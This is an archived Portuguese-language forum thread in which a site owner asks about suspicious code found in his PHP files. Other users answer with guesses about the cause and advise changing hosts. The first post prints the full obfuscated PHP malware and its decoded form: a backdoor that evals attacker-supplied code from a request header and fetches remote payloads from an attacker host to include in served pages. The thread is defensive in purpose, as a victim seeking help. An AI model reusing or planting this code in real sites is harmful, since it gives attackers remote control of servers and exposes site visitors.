Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

eduardoherden

Arquivos Suspeito no Servidor

Recommended Posts

Olá

 

Bom, ja estou com esse problema a um bom tempo.

Mas nunca dei muita importancia a essas partes de codigos que aparecem nos meus arquivos .php

 

PS: quebrei as linhas para ficar certinho.

 

Essa parte esta codificada

<?php 
/*versio:3.02*/ 
$GLOBALS["jlyhtl"]="MAaW5pX3NldAJkcYWxsb3dfdXJsX2ZvcGVuqOmZGlzcGxheV9lcnJvcnMTZmVkb3Ivd2VibmV0X3VwZ19hYg
My4wMgojddGhhaDFOaWV0aGFpMnphaDZBaHIbKvaHR0cDovLwrTzSFRUUFMnVb2ZmaObaHR0cHM6Ly8SFRUUF9IT1NUgIdW5pb24Fpoc2
VsZWN0KTpUkVRVUVTVF9VUkkCOpTkU0NSSVBUX05BTUUsNqUVVFUllfU1RSSU5HUPwjggboZGV0ZXJtaW5hdG9yeLgWzamLmxvZwqSFRU
UF9ZX0FVVEgYmFzZTY0X2RlY29kZQHdmVyc2lvDjpTLQHJLXBocASFRUUF9FWEVDUEhQKlfb3V0HVHxcb2sSFRUUF9VU0VSX0FHRU5UQm
FLAOCGZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleABsYQfAALYYWxqZXIuYml6BTtZmFzdGFkZHouY29tysL3c
zLnBocD91PQIstJms9aJnQ9cGhwJnA9YXpJnY9BtZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzdHYya2dRL3lv
YkMxVkdkZzAyTm8vbWZFclVvOWRJdlNTaTVLU3FGMW5FWG9QQitHMHdSUG51TitOZFkwT2dkMyt4N016T2UzNHo5bHdpWGpuVTlRTHFp
SUpETTVxc3ZXQ1doWW5RYnI4U0Q4aHVIdGlaRndZV0xidzBTOFY0SDFGN01mTkZWVkpsdGR0R3Zoc3Y4S3lVWmtkRVhkYTZiWm1vN2Vz
emRFMUhCblVFREYxZ2VDT1ZHbUxOZGttK3p4YlJLcDA1WXFzb2x2RitMWk1QclhTelNxTTVNY245MDdkdmJmSks2cHUxWnlkaDVxMnBt
Q1U1QlhrSnpmSWtJQzROM1VyRWlaWjU2bXl6UmJyeGQwRWh0dUtWRndlaFRGcjdjSjJsS2JqVWVzbjJib0hDQlR0UGZPR2F0UExsTXM0
OXVPRTBSYkRBcnd4SUdLZlN4em40S014OFA5eGE4TWh5dzRnR1FwdVlJRVVWMEdadTJJM3IrUlM1TFRzTU1ocEFYSVZGbGtXZk9oMkJL
SVRiZ3lkbWtFS0VEMXZUbmR0QzZRYjFVM291Tjl4RVRFbHJsZTdjTEFGcmIvaXRDRTliTHprTjZlN0lCOGhMR0tFWHJiVTdXeVhSRVpFV
zFBYlNEWDhvY3JFeStmdzArZmJ3T0xYZ1J5Yi93M1k3UjlNdnkvazZ2djFqUEpHSk93UGZmc2s1R1UrZkp2ZlR5ZTM5OXkvNGdxZjg4b1
BQRC9mMzQ4L1Q2ZDFmNDRlbnFVejZHSWhrdXduQ3VBd1BjN3Q2aDZJdzQ1YnRoeWx0M0dMQTZUcktRQU43REdHdXhRakM5VnVWWFg1Ylp
RcExsZFVncW5QVDBGNWhYZFJWTit4QzVjWEx6SWtXY0tEYnpJOVhNakc0enFwK1VjeG1zWXpTQlZOSGpqc0N6SGFqSEl1Z2Fobmh6L0dV
dlBJc3ZBa0twaUZka2EvVDZXTkhWYnB3OFUveVR3QS9YOE0wKzBUZzhNcE5laXNKR0tZZ2lzSUU3WDc4K21nOWZGZUVqcURnOGUveDVQ
dmR3LzBacFU4cFRUN2V6cUdtUDRGeTlyNlVWOG5jTHFEMnhhc0xmYzZkYXBNUEg0aDQwdGZrWTAzK2pXanRPaUFLQmhiYXFXR0lxZzNM
WHJseGVTSVBNTkJLMW1tK3ljRXBXa1IrNkZCUk9OZ25WeUtCTHc4UXNqajN6KzV6alN2ZStzdzd4bGZxZkR1Q211MCttc2VyK1R4S1k2Z
3kxODl6dWdIKzFUeVA0d3ljQUVRTWlmRERFaFJPVklSUGNHWjBucVFUaUZ6bXkzMlI3VjRXUlM2Mmx2dnRQdmZiTmJpMHJPL2pDV1RvSn
ljOTQrdldldmNTRjN2ekFNR0daUFJrcld5R1pSemtnVmVUZXRKUWxVdUt2M3paTExPYTBqY2tiU2hyQTZTeFdxbHBxanFRK2pnU1dOMTZ
hUm0reXBZYStpVzFwOHVEOW5NMVlXN2U4NHg2a3Q1REhuSmxrbHBCejVEVXJxeVgrSGFxWFFPYU5wQlZsV2VBTXlobW1pVlpDSWhNazNPY
VZOV1E5S0dzYW0zTXJ4c21kR1l2b09rc2JKNVpTbmhLek4vcmZLSE5JRFFLb2RyWXBYeGtoYUdCNVFnT0tPTW5GL0RjaUM3amdUalZTSD
VKbmpyc3c1Z2Qva3FjQ2dFZEdFemNHeGduWGwyS3ZLcDJwU0g0YW1Ec0VVN2VjMERnalpLaFJNYjM5R0ZYNmpFSm1PVExPUWFqTkpqdi9
jdWE5SzVrTUVuWXZmVkwyQXkwa2F5MVlZQ2NNVURENEpWeXIwKzZiTGVtKzJKYnJGekgzWWxZSU1zd0R1Y0wwL0dTWUFZSVlsbGY3cjZO
TGF1dC9IRTNnWEh3TVBrQjBoOXZKN2R3aEdwZXhLRmR6dnZiSkpudFJDSjBITHJwcElzMTlMYlF5ZFpSUjNGaFZuK0VSaW5xcTd2UDQrc
W10bGFZL3ZVb1BCL2ZqQTlYNC91L214elZYN0RxNklZL0tQV2c5TU42a1FQMnpCd0xyaTN3VFlBTmlydXFDSXoxOEhjYmZlVHJSWWM5U2
k5UWJhaDVDclNqRHVBQndSNXdiSCsyakhucFgvRWh5Qzh4MU95b21HY2p5NWFqMU5vbVhqWjdBZWh2dm1URzRNckJMcS9KQytoZlZTQmF
EVlRHZGwzV2Q5a3NmajAvY1JZQTZMd1N0c2ZXTzJaL0tLa2pEWXVsV2pLcmJtdmwvaHpxeEt3dzRseWw2eU5KSDdGZUFUdUR6RXZkdVht
emRveEtyOEpISWtkUGhXTWxJcU9iTzFFeE0wOXFVbWswSXZSczM0QXFWN2prNjNmV2E3MlJwS25NZWk0UVJjTTZBa3M2Qm96ZDFVTDcwR
GpxcUlUdEM2aUtJZzIxOU1rMHVXSjBqa2JoTWkrYVVEb29NUkVIS0J0T2ZBWWRqN0pHdDQ4QWx3MkFLYm1hSlVvekMxcC9XTHJLSmxCTj
BrWkRTZGZBNG1yVENSSjNVYVFtTitpY0N6MllNUUFQREZqZ3c0TnU0SksvKzUvVzlqUlYwbldZSWpKcGlJVnBPSko3YlZZbWhaZUpyR0p
hOFh6dlVvU0ZMN2lZUWdLMlc5OE45d2lQL3pGWW9JQTBuSlhkNDhsUzdSeU42RW05QVNKZTA1NVJGMmFFYk1Db0t4c3cyTnU1NjU3TUht
YUpmS0JlbVdacEpLWTAzRHJPUEN6M1RiWnJubFlMSXJuYTdjbjlwbHJkNkV0WWxWaG9NSWhtZVlvU2N1dzJHMjArNCthZ0IyT1hqUXpjb
kYzc2NtaHhwaCtXYzF6ZTJyREVaTERSTUR2NUh5WWYvcFJMNFdGTFl3L0w5YUtNdkRtRnplOElGU284d1Urb3lxK3lGckl3dHhkaTNTc0
FtYmFmTzlRS0E1czI3aHM0VUdVWFB0QlFEMFl1ZWdrVzIrSXdCK282MWlTOTI4ZEZvUkV3VGNYcU5yQWVxN1k3dGdJbGNyQnB4SkZmb1p
kc095ZU5DZGlEN2xPaFFGVWRXb1l4MW1rem9QNVZXVC9nUmszUis1SStHS0I5N3h1dDE4VmFISlh2V0grQ1ppK2NyellaYUQ3NUZtWUJn
SDIzL2h5K2ZoOWNocy84OCtZOWRtbTRKcGJZeGZleGZ3RXpRRGpSIikpKTs";


///////////arquivo ai de cima , decodificado
if(!function_exists('qzpechal')){
	function qzpechal($a, $b){
		$c=$GLOBALS['jlyhtl'];
		$d=pack('H*','6261736536345f6465636'.'f6465');
		return $d(substr($c, $a, $b));
	};
	eval(qzpechal(544,3267));
};
?>

Agora segue a parte decodificada

<?php if (!defined("determinator")) {
    if (function_exists(qzpechal(1 + 1, 10))) {
        @ini_set(qzpechal(1 + 14, 20), 1);
        @ini_set(qzpechal(24 + 14, 19), 0);
    }
    function _ayruzthpksad($xxjqzm, &$svkspg = NULL) {
        $svkspg = microtime(true);
        return feof($xxjqzm);
    }
    function _gsdwthsvlynx($qkiqno, $zomtss) {
        $btzfxg = "curl";
        $ujjqui = $btzfxg . "_init";
        if (@ini_get("allow_url_fopen") == "1") {
            return @file_get_contents("http://" . $qkiqno . $zomtss . "&w=fgc");
        } elseif (function_exists($ujjqui)) {
            $ksyftr = @$ujjqui();
            $bueoey = $btzfxg . "_setopt";
            $mfakrp = $btzfxg . "_exec";
            @$bueoey($ksyftr, CURLOPT_URL, "http://" . $qkiqno . $zomtss . "&w=cu");
            @$bueoey($ksyftr, CURLOPT_HEADER, false);
            @$bueoey($ksyftr, CURLOPT_RETURNTRANSFER, true);
            @$bueoey($ksyftr, CURLOPT_CONNECTTIMEOUT, 6);
            $rwvnoq = @$mfakrp($ksyftr);
            @curl_close($ksyftr);
            if(empty($rwvnoq)){
				$rwvnoq = "";
            }
            return $rwvnoq;
        }else{
			$xxjqzm = @fsockopen($qkiqno, 80, $qjtdph, $ewtlqk, 5);
            if ($xxjqzm) {
                $vhjpsh = "";
                $svkspg = NULL;
                @fputs($xxjqzm, "GET {$zomtss}" . "&w=sk HTTP/1.0" . " " . "Host: " . "{$qkiqno}");
				$npporm = PHP_OS . "/" . PHP_VERSION;
				@fputs($xxjqzm, "User-Agent: {$npporm} ");
				while(!_ayruzthpksad($xxjqzm, $svkspg) && (microtime(true) - $svkspg) < 2){
					$vhjpsh.= @fgets($xxjqzm, 128);
				}
				@fclose($xxjqzm);
				$rmsuvu = explode(" ", $vhjpsh);
                unset($rmsuvu[0]);
                return implode(" ", $rmsuvu);
			}
        }
    }
    function _wzpgqkggpsqp($fluuev, $kguqqt){
		echo "Y_" . $fluuev . ":" . $kguqqt . " ";
    }
    function _ajujzxtybhxu($jzwzul) {
        return @$_SERVER[$jzwzul];
    }
    $mybqxz = qzpechal(5 + 53, 26);
    $jqnuni = qzpechal(3 + 81, 6);
    $ljbvjt = qzpechal(65 + 28, 27);
    $qkiqno = qzpechal(117 + 6, 10);
    if (isset($_SERVER[qzpechal(2 + 134, 7) ])) {
        if (@$_SERVER[qzpechal(93 + 43, 7) ] != qzpechal(135 + 10, 4)) {
            $qkiqno = qzpechal(25 + 127, 11);
        }
    }
    $qkiqno.= strtolower(@$_SERVER[qzpechal(115 + 48, 12) ]);
    foreach ($_GET as $fluuev => $kguqqt) {
        if (strpos($kguqqt, qzpechal(25 + 152, 7))) {
            $_GET[$fluuev] = qzpechal(35 + 152, 0);
        } elseif (strpos($kguqqt, qzpechal(186 + 1, 8))) {
            $_GET[$fluuev] = qzpechal(12 + 175, 0);
        }
    }
    if (!isset($_SERVER[qzpechal(110 + 88, 15) ])) {
        $_SERVER[qzpechal(193 + 5, 15) ] = @$_SERVER[qzpechal(180 + 38, 15) ];
        if (isset($_SERVER[qzpechal(212 + 24, 16) ])) {
            $_SERVER[qzpechal(140 + 58, 15) ].= qzpechal(224 + 29, 2) . @$_SERVER[qzpechal(235 + 1, 16) ];
        }
    }
    function _ymezxwxkfdfy() {
        $joqogh = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        $hqocxg = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $joqogh . "tmp", $joqogh . "wp-content/uploads", $joqogh . "wp-content/cache",);
        foreach ($hqocxg as $dclajq) {
            if (!empty($dclajq)) {
                $dclajq.= DIRECTORY_SEPARATOR;
                if (@is_writable($dclajq)) {
                    $joqogh = $dclajq;
                    break;
                }
            }
        }
        return $joqogh;
    }
    if (strlen($qkiqno) < 10) {
        define(qzpechal(68 + 192, 16), 0);
    } elseif ($ulgfdf = $qkiqno . @$_SERVER[qzpechal(149 + 49, 15) ]) {
        $ntisfg = @md5($qkiqno . PHP_OS . $jqnuni . $ljbvjt);
        $fudpxa = _ymezxwxkfdfy() . qzpechal(112 + 165, 2) . $ntisfg;
        define(qzpechal(239 + 21, 16), $fudpxa);
        $ksyter = $fudpxa . qzpechal(64 + 219, 6);
        if (@$_SERVER[qzpechal(239 + 51, 15) ] == $ntisfg) {
            $epojux = qzpechal(257 + 48, 18);
            echo "";
            _wzpgqkggpsqp(qzpechal(219 + 105, 8), $jqnuni . qzpechal(68 + 268, 2) . $mybqxz . qzpechal(298 + 42, 6));
            if ($nrfhxs = $epojux(@$_SERVER[qzpechal(317 + 29, 16) ])) {
                eval($nrfhxs);
                echo "";
                _wzpgqkggpsqp(qzpechal(321 + 44, 4), qzpechal(315 + 59, 3));
            }
            exit(0);
        }
        $qgzfeg = False;
        $wwlfoz = @strtolower(@$_SERVER[qzpechal(149 + 228, 20) ]);
        foreach (explode(qzpechal(21 + 379, 2), qzpechal(390 + 15, 54)) as $nzcuff) {
            if (strpos($wwlfoz, $nzcuff) !== False) {
                $owddgo = @fopen($fudpxa . qzpechal(180 + 103, 6), qzpechal(456 + 5, 2));
                $guqaus = @urlencode(@$_SERVER[qzpechal(73 + 125, 15) ]);
                @fwrite($owddgo, time() . "	" . $nzcuff . "	" . $guqaus . " ");
                @fclose($owddgo);
                $qgzfeg = True;
                break;
            }
        }
        if (@is_file($fudpxa)) {
            @touch($fudpxa);
            @include_once ($fudpxa);
        } elseif ($qgzfeg === True) {
            $pbnhwx = Array(qzpechal(62 + 406, 12), qzpechal(218 + 265, 16));
            if (@touch($fudpxa)) {
                $ulgfdf = @urlencode($ulgfdf);
                $zomtss = qzpechal(357 + 144, 14) . $ulgfdf . qzpechal(517 + 1, 4) . $ntisfg . qzpechal(46 + 477, 12) . $mybqxz . qzpechal(309 + 229, 4) . $jqnuni;
                $iogkvt = _gsdwthsvlynx($pbnhwx[0], $zomtss);
                @touch($fudpxa);
            }
        }
    } else {
        define(qzpechal(232 + 28, 16), 1);
    }
}

Alguém ja viu algo parecido?

 

 

Contrato a hostgator, sera que possui alguma falha na segurança?

 

 

 

 

Compartilhar este post


Link para o post
Compartilhar em outros sites

Tenho a mesma coisa nos sites muito estranho isso

 

 

pois é cara, muito suspeito isso

 

ja busquei no google e vi que tem uns gringo que também tão com esse problema

 

alguma solução ?

Compartilhar este post


Link para o post
Compartilhar em outros sites

#3 não sei se é seu caso, mas de vez enquanto aparece uns cara aqui falando sobre falha no servidor ou algo do tipo.

 

Quando vai mais a fundo, vê que não valida as entradas get, post, request isso falando do sistema,

 

ae vem outra questão, a pirataria, onde baixam IDEs ou outro software do gênero contaminados, dando uma de cracker, só que não passa de um lammer e sendo usado, na primeira oportunidade o software baixado usa o servidor junto com ele. :coolio:

 

E só ativar um ftp e lá está o código. :devil:

Compartilhar este post


Link para o post
Compartilhar em outros sites

Isso aí tá estranho, aparece nos scripts upados?

 

Exato, faz um ano que os arquivos estão no servidor

dai faz uma semana mais ou menos que resolvi baixar eles e certos projetos dar uma melhorada e também fazer backup.

 

Dai encontro esse script nos arquivos .php

#3 não sei se é seu caso, mas de vez enquanto aparece uns cara aqui falando sobre falha no servidor ou algo do tipo.

 

Quando vai mais a fundo, vê que não valida as entradas get, post, request isso falando do sistema,

 

ae vem outra questão, a pirataria, onde baixam IDEs ou outro software do gênero contaminados, dando uma de cracker, só que não passa de um lammer e sendo usado, na primeira oportunidade o software baixado usa o servidor junto com ele. :coolio:

 

E só ativar um ftp e lá está o código. :devil:

 

 

Pois é cara

 

creio que não seria por isso de validação de post e get

 

pois até projetos que usam magento e wordpress.

Ou POO e OO , também estão bastante comprometidos

 

Aqui na empresa, não é usado nada pirateado.

Ftp, uso o filezilla

Compartilhar este post


Link para o post
Compartilhar em outros sites

Mano sai dessa hospedagem, nunca nenhuma hospedagem irá alterar arquivos php upados.

Compartilhar este post


Link para o post
Compartilhar em outros sites

×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.